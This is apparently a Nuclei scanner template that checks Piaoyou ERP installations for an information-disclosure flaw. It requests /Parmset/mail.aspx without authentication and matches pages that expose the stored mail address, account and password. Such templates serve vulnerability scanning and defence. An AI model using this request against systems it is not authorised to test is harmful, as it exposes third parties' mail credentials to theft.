id: piaoyouERP-mail_aspx-Information-disclosure

info:
  name: 票友ERP管理系统 mail.aspx 信息泄露漏洞
  author: piaoyouERP
  severity: medium
  tags: Information disclosure

http:
  - raw:
      - |
        GET /Parmset/mail.aspx HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '邮箱地址'
          - '邮箱帐号'
          - '邮箱密码'
        condition: and
      - type: status
        status: 
          - 200